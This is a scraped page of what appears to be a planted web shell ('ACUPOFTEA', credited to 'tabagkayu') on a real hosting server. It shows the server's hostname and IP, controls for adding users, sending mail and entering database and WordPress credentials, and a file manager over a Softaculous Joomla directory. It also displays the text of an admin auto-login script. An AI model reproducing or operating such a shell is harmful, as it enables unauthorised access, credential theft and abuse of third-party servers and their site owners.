System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
joomla310
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
sign_on.php
<?php @unlink(__FILE__); // Validate if the request is from Softaculous if($_REQUEST['pass'] != '[[autopass]]'){ die("Unauthorized Access"); } define('_JEXEC', 1); if (file_exists(__DIR__ . '/defines.php')) { include_once __DIR__ . '/defines.php'; } if (!defined('_JDEFINES')) { define('JPATH_BASE', __DIR__ . DIRECTORY_SEPARATOR . 'administrator' ); require_once JPATH_BASE . '/includes/defines.php'; } require_once JPATH_BASE . '/includes/framework.php'; require_once JPATH_BASE . '/includes/helper.php'; require_once JPATH_BASE . '/includes/subtoolbar.php'; $app = JFactory::getApplication('administrator'); // Check for a cookie if user is not logged in if(JFactory::getUser()->get('guest')){ $signon_user = '[[signon_username]]'; $options = array('action' => 'core.login.admin'); $instance = Joomla\CMS\User\User::getInstance(); $db = JFactory::getDbo(); if(!empty($signon_user) && !preg_match('/^\[\[(.*?)\]\]$/is', $signon_user)){ $id = (int) Joomla\CMS\User\UserHelper::getUserId($signon_user); }else{ $query = $db->getQuery(true); $query->select($db->quoteName('user_id')) ->from($db->quoteName('#__user_usergroup_map')) ->where($db->quoteName('group_id') . ' = 8' ); $db->setQuery($query); $users = $db->loadColumn(); $id = min($users); } if (!$id) { $app->redirect('administrator/index.php'); exit(); } $instance->load($id); // If the user is blocked, redirect with an error if ($instance->block == 1) { $app->redirect('administrator/index.php'); exit(); } $result = $instance->authorise($options['action']); // Mark the user as logged in $instance->guest = 0; $session = Joomla\CMS\Factory::getSession(); // Grab the current session ID $oldSessionId = $session->getId(); // Fork the session $session->fork(); $session->set('user', $instance); // Ensure the new session's metadata is written to the database $app->checkSession(); // Purge the old session $query = $db->getQuery(true) ->delete('#__session') ->where($db->quoteName('session_id') . ' = ' . $db->quoteBinary($oldSessionId)); $db->setQuery($query)->execute(); $instance->setLastVisit(); } $app->redirect('administrator/index.php'); exit();
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2024-06-25 09:48:19
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2024-06-25 09:48:19
languages
DIR
-
drwxr-xr-x
2024-06-25 09:48:19
php53
DIR
-
drwxr-xr-x
2024-06-25 09:48:19
php56
DIR
-
drwxr-xr-x
2024-06-25 09:48:19
php71
DIR
-
drwxr-xr-x
2024-06-25 09:48:19
php81
DIR
-
drwxr-xr-x
2024-06-25 09:48:19
php82
DIR
-
drwxr-xr-x
2024-06-25 09:48:19
check_utf8.php
text/x-php
1.07 KB
-rw-r--r--
2021-12-23 06:54:36
clone.php
text/x-php
4.57 KB
-rw-r--r--
2024-05-02 07:22:18
configuration.php
text/x-php
1.95 KB
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
5.82 KB
-rw-r--r--
2024-05-02 07:22:18
edit.xml
text/html
629 B
-rw-r--r--
2021-12-23 06:54:36
extend.php
text/x-php
8.8 KB
-rw-r--r--
2024-05-02 07:22:18
fileindex.php
text/plain
225 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
8.66 KB
-rw-r--r--
2024-05-02 07:22:18
info.xml
text/html
3.58 KB
-rw-r--r--
2024-05-02 06:25:50
install.js
text/plain
955 B
-rw-r--r--
2024-03-11 06:40:22
install.php
text/x-php
20.23 KB
-rw-r--r--
2024-05-02 07:22:18
install.xml
text/html
2.96 KB
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
9.49 KB
-rw-r--r--
2024-05-02 07:22:18
notes.txt
text/plain
3.05 KB
-rw-r--r--
2023-07-12 06:17:56
restore.php
text/x-php
2.23 KB
-rw-r--r--
2024-05-02 07:22:18
sign_on.php
text/x-php
2.17 KB
-rw-r--r--
2021-12-23 06:54:36
update_pass.php
text/x-php
497 B
-rw-r--r--
2021-12-23 06:54:36
upgrade.php
text/x-php
30.83 KB
-rw-r--r--
2024-05-02 07:22:18
upgrade.xml
text/plain
730 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com